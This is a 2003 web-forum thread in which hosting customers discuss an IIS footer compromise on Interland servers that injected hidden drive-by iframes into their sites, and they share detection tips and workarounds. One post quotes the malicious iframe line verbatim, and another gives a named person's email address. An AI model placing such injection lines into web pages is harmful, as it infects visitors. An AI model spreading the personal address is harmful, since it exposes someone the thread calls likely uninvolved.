Welcome to WebmasterWorld Guest from 54.242.115.55

Forum Moderators: phranque

Message Too Old, No Replies

My hosting company's server infected with Trojan

Any HELP appreciated!

     
11:15 am on Aug 29, 2003 (gmt 0)

Junior Member from US 

10+ Year Member

joined:July 7, 2001
posts:75
votes: 0


Hi Guys,

My company's site is on an interland windows server. This afternoon 8/28/03 something bizarre began to happen...

Upon loading our site, the URL in the status bar read something like "Opening Page"... www.widgit.com/_vti_con/rip.asp

That is NOT our URL. The status bar should have OUR URL. I called Interland about 6:00pm 8/28/03 and they said they were working to remove the problem.

I learned that there is a Trojan which adds some script to all the HTML files on the WebServer. Interland said they experienced this several months ago, and now, in the last 24 hours a new version of the Trojan has struck back again.

One of our computers at the office started popping Desktop Icons on the Desktop... Its name was malware334.exe

But the real way of seeing if your site is affected is to check the bottom of your HTML page. If infected, the trojan adds an <iframe> tag with an HREF to the beech-info2.com site.

I could say more, but I'm exhausted right now from lack of sleep.

So I just wanted to alert anyone who either SURFS on sites hosted by Interland -OR- manages sites hosted by Interland.

If you surf to an infected site, your computer can become infected, depending on your OS and browser versions.

And if anyone can shed some more light on this matter, I'd be very grateful.

Sincerely,
Gene

11:39 am on Aug 29, 2003 (gmt 0)

Junior Member from US 

10+ Year Member

joined:July 7, 2001
posts:75
votes: 0


I forgot to add...

Interland says they have deleted the embedded scripts in the infected HTML files, as well as whatever else needed to be done.

As a precaution, I've taken my site down until I can be sure this problem is truly resolved.

The site does appear to be clean now, however.

I'm wondering if I should just wipe out everything on my virtual server with them and upload a fresh set of files.

~Gene

6:39 pm on Aug 29, 2003 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month

joined:Nov 15, 2001
posts:1741
votes: 41


does not seem much point in spending too much effort to upload new versions of all files if the infection is still rife on their servers, they may just get reinfected.

I would try to get regular updates from them as to when they will be clean .. then go in a check the damage and replace your sites at that time ... if you can redirect users to a holding page for a day or so .. how long can it take them to sort themselves out?

8:34 am on Aug 31, 2003 (gmt 0)

Junior Member from US 

10+ Year Member

joined:July 7, 2001
posts:75
votes: 0


After learning a little more about this problem, I fired off a lengthy and detailed email to Interland. (My question to Webmaster World members is, Am I handling this situation correctly?)

email deleted

What else should I do Webmaster World members?

Interestingly, I found a forum B.B. where an earlier version of this trojan was discussed in May 2003, which ALSO affected Interland servers...

It only takes a minute to read, if you're interested.

~Gene

[edited by: Brett_Tabke at 9:35 am (utc) on Sep. 4, 2003]

8:51 am on Aug 31, 2003 (gmt 0)

Senior Member

joined:Nov 20, 2000
posts:1336
votes: 0


>> What else should I do Webmaster World members? <<

If it's an important site that you depend upon for income, always have control of the domain name and access to a backup host, perhaps a multi-host (even a cheapie at a handful of $ per month).

That way, as soon as you hit a problem you can re-point.

Worst scenario then is maybe 24-48 hours. Not wonderful, but a lot better than sitting there a day later with maybe the host still not having sorted the problem. You can always point back if it's sorted quickly... but you can't recapture time if it isn't.

3:10 pm on Aug 31, 2003 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Sept 21, 1999
posts:2141
votes: 0


My suggetion is to seek new hosting promptly and consider moving to *nix based hosting. I don't want to start another M$ vs *nix "holy war" but there are substantially fewer exploits available to "script kiddies" for *nix based systems. Life offers plenty of problems, my choice is to avoid as many as I can so that I can focus all my energies on those that can't be avoided.
4:15 pm on Sept 2, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 2, 2003
posts:5
votes: 0


Another Interlander hit...

Looks like what it's doing is adding an <IFRAME> to the page that requests a page off beech-info2.com called "rip.asp". Apparently some kind of Javascript exploit.

Two quick notes:

1) people who surf the web on WinNT-based systems (including Win NT, Win 2K, and Win XP) should probably add a line to their hosts file pointing www.beech-info2.com to 127.0.0.1, so they don't access this rip.asp file.

2) I FTP'd to the webserver, and it looks like the files aren't being infected - it's IIS that's appending this <IFRAME> tag just before serving the file. The files on my server don't have said <IFRAME> in the code. Just a heads up to anybody running an IIS webserver and looking for this infection. That means re-uploading your files won't help, either, since the files are untouched.

5:29 pm on Sept 2, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 2, 2003
posts:2
votes: 0


My Interland hosted sites are experiencing the same thing...can anyone think of any fix in the short term? I tried to use a style sheet to redefine the iframe tag with

display: none;
visibility: hidden;

Unfortunately, this doesn't appear to do the trick.

I hope this is fixed soon by Interland, and hope to see some kind of status report from them soon.

Nate

5:53 pm on Sept 2, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 2, 2003
posts:5
votes: 0


Mmm, the only thing I can think of is to add a little javascript to do document.frames[0].src = ""; or something like that, but you'd have to put it on every page (include files, framesets, everything) and if your site uses frames, you'd need to find the right frame... Bit of a pain.

You could also add a HTML open comment to the end of every page, that might work. Just <!-- at the end of every page, since this IFRAME is being appended to the end of the file... So the browser will think the IFRAME is a comment and not parse it.

Other than that, add the 127.0.0.1 www.beech-info2.com to your hosts file to keep your *local* machine from being infected. Looks like this IIS infection is just to open up distribution of *another* virus.

Yeesh.

6:05 pm on Sept 2, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 2, 2003
posts:2
votes: 0


The comment idea is an interesting one...fortunately, the problem seems to have been resolved for the time being. I hope others are finding this is true as well.

Nate

2:39 am on Sept 3, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 3, 2003
posts:3
votes: 0


Also hosted on Interland (shared Windows 2000 environ)

My shared server and domain became infected today (9/2/03). The infection seems to be spreading; search the string in Google and it is now up to 5 pages of sites w/infection).

Interland claims to know of the infection and says they have written a job script to remove references and fix the IIS side of things.

It seems, though, that they don't have a good handle on this. The first post in this thread goes back to 8/28 and I was infected at about 4pm Eastern today.

The reseller support tech I worked with knew of the issue, but had no info that would assist me.

That is the latest update from shared-server hosting hell.

Rich

2:49 pm on Sept 3, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 2, 2003
posts:5
votes: 0


Another update:

I just spoke to Interland again - since they hadn't completely fixed the problem. Files with a *.js extension (javascript source files) were still being tagged with the IFRAME. The good news, of course, is that HTML in a javascript source won't be parsed. The bad news is that the *.js files stop working.

Turns out this guy is *actively* hacking Interland. They supposedly have a Microsoft dude flown in, and they're doing a little mano-a-mano. Who knows? The hope is to be "permanently patched in 12 to 24 hours." Ugh.

"Previously unknown IIS exploit," where have I heard those words before...?

R_Gidley

3:52 pm on Sept 3, 2003 (gmt 0)

Inactive Member
Account Expired

 
 


Lots of good info here.

Thought I'd add a symptom for those (like me) who get baffled by things disappearing from their web sites.

If you're running the AllWebMenus menu script (which uses JavaScript for the menus), this hack will disable the menus. The <iframe> gets added to the last line of the main JavaScript file, which generates an error and prevents the menu from appearing.

This is how we first realized something was wrong.

Apparently, the <iframe> line is added dynamically--if you look at the JavaScript source on the web site, it's not there, but when you load it in a browser, it is.

As of 15:50 UTC on Sept 3, my client's web site is still infected. I have strongly recommended to them that they switch to a different ISP (right now, we're redirecting their web site to mine, which doesn't use Interland).

Robert Gidley
<snip>signature line two</snip>
<snip>signature line three</snip>

[edited by: DaveAtIFG at 3:59 pm (utc) on Sep. 3, 2003]

4:07 pm on Sept 3, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 3, 2003
posts:3
votes: 0


I found out the same way, as I'm using Sothink DHTML menus. Java using FrontPage still works, but Javascript is not working. It throws an IE error, which prevents it from loading

criminalbeta

11:04 pm on Sept 3, 2003 (gmt 0)

Inactive Member
Account Expired

 
 


All,

The iframe footer is a dynamic footer that has been added to the IIS 5 configuration of the server aka "Global Footer". Low end hosts use this feature in IIS 5 to add advertisements and other such things to a customers page. This is not an infection of the web server itself. The source file that the footer is pointing to [wvw.beech-info2.com...] is the source of the trojan virus. NOTE:'wVw'.beech-info2.com. In order to pull off such a hack you would have to have a script located in Interland's network that ran at a regular interval, along with some other hacking tools to gain access to the servers IIS configuration. Their are alot of legitimate scripts that do this. The only malicious thing about this is the source file rip.asp.

The domain name beech-info2.com is owned by ryan shepherd (ryan_shepherdpp@yahoo.com) but I am sure he is unaware of this situation. If the hacker has half a brain he will have hacked this poor guys DNS and added an A record to resolve wvw to a different IP than the one that is listed for beech-info2.com. Or the domain was bought under false information, either way it is almost completely untraceable. The bad ting is, is that all host are vulnerable to this. This hacker just chose Interland to reep havoc on.

CRiMiNaL BeTa

11:52 pm on Sept 3, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 3, 2003
posts:16
votes: 0


URL (IP address) used in iframe attack back in July (7/28/03) is the same one that URL wwww.beech-info2.com points to now.... (note 4 w's)

There's also ww, www, wvw : beech-info2.com... The TLD and WWW point to one place, all others point to different places. I'd like to know there are no other aliases out there waiting!

The attack on July 28th was the above IP, with a URL in the iframe of IP/cgi-bin/inf.htm, which redirected to a file named readme.pl, which triggered a file download like this time. Maybe the hole from May 18, 2003 was never plugged, and not plugged again on July 28th? To think that the attack this time was exactly one month after the one in July.... Also, with the beech-info.com information on the LabMice.net attack (that was the URL in the iframe), and the beech-info2.com URL, seems pretty certain this is the same guy or gal, or more backlash of the same original hack. All three iframe attacks do appear to be from the same person.

12:17 am on Sept 4, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 3, 2003
posts:3
votes: 0


RE: Interland

By 4pm today (eastern) 14 of my sites at Interland were patched/fixed and have remained free of any issues (for now...)

12:39 am on Sept 4, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 3, 2003
posts:16
votes: 0


You can find out by looking (in IE6 anyway) at the privacy report for the page. Go to

View --> Privacy Report...

If you see something from *.beech-info* then you are seeing a page with the IIS footer set with the malicious iframe tags.

If you add beech-info2.com to your restricted sites zone, you will see an "Unknown (Mixed)" security zone displayed in your IE status bar. I get a "Your current security settings prevent you from running ActiveX controls on this page. As a result, the page may not display correctly." (thankfully) - I visit an infected page.

I currently have one page still affected, but others appear to be fixed. Reloaded and cleared cache, but still there.

1:22 pm on Sept 4, 2003 (gmt 0)

Junior Member from US 

10+ Year Member

joined:July 7, 2001
posts:75
votes: 0


Hello fellow webmasters,

I've been away from the FORUMS for a few days since I started this thread. Going nuts with this thing.

Anyway, on Sept 3, we called Interland's Sales people and requested a switch over to a UNIX server.

Within hours I received an email confirmation & then called back to confirm the switch. Then, a few hours later our Domain Name was pointing to the NEW IP address.

So we are through with the IIS server, and its UNIX from here on out.

The transition went very smoothly working with their sales people.

I'll be uploading a fresh set of files in the coming day or two.

If you don't need the features of a Windows server, you may want to make the switch. Hopefully, this will work out well.

If you do stick with Windows, keep us posted as to your progress with the Bug.

Best Wishes,
Gene

P.S. the rip.asp file as you probably know contains an object tag pointing to a perl file called inf2.pl
I think I have a copy of what reads inside of it. I'll post the info later. Its kind of interesting. But I'm late for work right now. gotta go.

P.P.S. I have one NEW question about the Nix box. When I used to FTP on win server, the file size was always the same on both "panes" of my WS_FTP program.
But now when I upload a 186 byte file to the Nix box, the remote pane on the Nix server displays the file size as 179 bytes. WHAT'S UP WITH THIS? Thanks for any insights you may have...

~Gene

1:57 pm on Sept 4, 2003 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Sept 21, 1999
posts:2141
votes: 0


Good to hear you're making progress Gene! Windoze and *nix store files and display file sizes a little differently, what you describe is perfectly normal. For other *nix questions please start a new thread, we're way off topic after all... ;)
4:41 pm on Sept 4, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 3, 2003
posts:16
votes: 0


iframe back as of 12 Noon EDT 9/4/03 (on my shared Tru). Has anyone confirmed if adding an open comment tag after </html> in the documents will prevent the iframe from being parsed?
e.g.
...
</HTML>
<!-- stop the iframe

or
...
</HTML>
<% response.end %>

From a webmaster standpoint, it would be nice to help prevent new browsers from being infected.

R_Gidley

4:43 pm on Sept 4, 2003 (gmt 0)

Inactive Member
Account Expired

 
 


Heads up, all.

My client's Interland sites were cleaned up and fine yesterday, but today have been reinfected.

I'm getting tired of this....

Robert Gidley

R_Gidley

4:48 pm on Sept 4, 2003 (gmt 0)

Inactive Member
Account Expired

 
 


Tried the comment thing, but it doesn't seem to work.

Our symptom is that menus are disabled in Internet Explorer. When I look at the source , this is what I see:

</html>
<!--

<iframe src=http://wvw.beech-info2.com/_vti_con/rip.asp width=0 height=0 frameborder=0 marginwidth=0 marginheight=0></iframe>

So it *ought* to be commented out, but it's not (the menus are still disabled).

Robert Gidley

5:02 pm on Sept 4, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 3, 2003
posts:16
votes: 0


Does anyone know if the target URL is still 'virulent' or 'squirming'?

Should jokerDOTcom change all sub-domains off of beech-info2DOTcom to local loopback IP 127.0.0.1? Maybe that way, new people would be prevented from being infected?

10:05 pm on Sept 4, 2003 (gmt 0)

Junior Member from US 

10+ Year Member

joined:July 7, 2001
posts:75
votes: 0


Hi all,

Don't hold me to this, but our experience with this bug suggests that if you're surfing on IE 5.5 sp2 or IE 6.0 with updated service packs, then the bug's ultimate goal of "infecting" your PC won't be realized.

However, if you surf to an infected site on anything less than IE 5.5 sp2, then your PC could be maliously infested with malware.exe files and DLL files, which can be difficult to search & destroy.

This is how we learned of the issue last week... One of our older PCs had IE 5.0 and that employee's machine was hit with the desktop exe icons that I mentioned in my 1st message.

Of course, it's still disconcerting to have this thing poking its nose into your PC, but I don't think it will do any real damage if your updated sufficiently. Again, that's just my opinion.

The inf2.pl file that I mentioned this morning seems to contain the script that creates the malware.exe files on the PC's hard drive. We also identified a file named wiroivd that we believe was associated with the bug, but only on IE 5.0 machines.

We do have rip.asp or rip.htm files in the Cache of our XP machines, but they never successfully retrieved the perl file from the beech-info site.

What we HAVE experienced on XP machines with IE 6 is that "sometimes" a surfer will get a "Network Log In" pop up which requests their UserName and password. The "site" and "realm" listed on the pop up does say beech-info2 however.

Hopefully, most folks would be saavy enough to question this sort of behavior on their PC, though I'm sure many would not.

Also, as mnamesir mentioned, this thing seems to be changing its target URL almost daily. We never experienced that, but another Interland customer that I've been in touch with did say that the URL was being modified from the original beech-info2 domain name.

Of course now that we've switched to unix, everything is back to normal. But I do feel for all of you who are dealing with this issue. Please keep us posted as to your progress.

Sincerely,
Gene

6:08 am on Sept 5, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 2, 2003
posts:1
votes: 0


I think Interland must delete or add something key in Windows Registry by using regedit.exe to fix problem with footer.
12:52 pm on Sept 5, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 3, 2003
posts:3
votes: 0


Interland called last night (I'm a reseller and have a bunch of accounts with them and told them "get it fixed now or I'm going someplace else") to report that all of my domains were now clean.

They also said that they didn't know what this was two weeks ago and were trying to spot clean it one virtual site at a time.

Once they realized it was server-based and that cleaned sites were being re-infected, they moved to a batch script and isolated the servers. For now, that seems to have done the trick.

My sites are all still clean, although I had to clear my cache just to be sure. One clean site was still showing locally as infected until I cleared.

1:08 pm on Sept 5, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 3, 2003
posts:16
votes: 0


Like you, rpalarea, I do not see the iframe text being added this AM, as of the time of this post.
4:45 pm on Sept 5, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 5, 2003
posts:2
votes: 0


Thanks for that last note. Empty the cache and you'll see no more Error line. By the way, if your viewing using a Mac, the .exe virus won't be a problem, right?
Thanks
12:20 am on Sept 6, 2003 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Sept 21, 1999
posts:2141
votes: 0


Wired News has posted a story about this Interland problem at [wired.com...]
This 40 message thread spans 2 pages: 40